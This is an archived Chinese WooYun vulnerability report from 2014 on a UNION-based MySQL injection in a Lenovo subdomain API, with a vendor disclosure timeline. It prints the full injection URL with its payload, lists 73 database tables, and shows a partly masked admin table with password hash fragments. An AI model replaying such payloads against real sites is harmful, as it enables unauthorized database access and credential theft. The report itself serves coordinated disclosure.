乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-11-04: 细节已通知厂商并且等待厂商处理中 2014-11-04: 厂商已经确认,细节仅向厂商公开 2014-11-14: 细节向核心白帽子及相关领域专家公开 2014-11-24: 细节向普通白帽子公开 2014-12-04: 细节向实习白帽子公开 2014-12-19: 细节向公众公开
联想另一分站MySQL注射,支持union。
注入点:
http://hao.lenovo.com/mps/api/safeNavList.php?cookieId=&pageName=1%27%20union%20all%20select%201%2C2%2C3%2C4%23
几个参数都能注入。支持union。
Database: nps[73 tables]+------------------------------+| version || banner || cats || cats_son || hots || hots_words || nps_admin || nps_admin_log || nps_admin_role || nps_admin_url || nps_admin_user_role || nps_advertisement || nps_alarminfo || nps_app_version || nps_area || nps_article || nps_article_comment || nps_article_post || nps_channel || nps_client_news || nps_client_news_inform || nps_dengmi || nps_dengmi_result || nps_feedback || nps_hot_spot || nps_hot_url || nps_hot_url_bak || nps_hotword || nps_img_big_bit_map || nps_img_thumb || nps_ip || nps_left_web || nps_link || nps_news_head || nps_page || nps_page_catagory || nps_privilege || nps_recommend || nps_role || nps_role_privilege || nps_safe_nav || nps_shorturl || nps_single_activity_20121106 || nps_single_activity_20121107 || nps_single_activity_20121108 || nps_single_activity_20121109 || nps_single_activity_20121110 || nps_single_activity_20121111 || nps_single_activity_20121231 || nps_single_activity_20130101 || nps_single_activity_20130102 || nps_single_activity_20130103 || nps_single_activity_20130104 || nps_single_activity_qb || nps_single_activity_win || nps_source || nps_suggestion || nps_user_admin || nps_user_post || nps_user_post_catagory || nps_version || nps_visitor || nps_visitor_qb || nps_voice_hot_words || nps_vote || nps_vote_catagory || nps_vote_log || nps_weather || nps_weather_bak || nps_webplus || nps_wei_xs || nps_welcome || web_url |+------------------------------+
admin表:
*****+---------------------**********word **********-------------------**********DC3949BA59ABBE56E05**********DC3949BA59ABBE56E05**********DC3949BA59ABBE56E05**********----------------------********************le: nps_**********tri**********---------------********** password **********---------------********** 8703D6533E44D6********** 2fccb36355ec6b********** 650EA49749BB32********** 05dd67bc6d7d37********** 0192023a7bbd73**********------------------*****
过滤
危害等级:中
漏洞Rank:10
确认时间:2014-11-04 16:42
感谢您对联想安全工作的支持,我们会尽快修复漏洞
暂无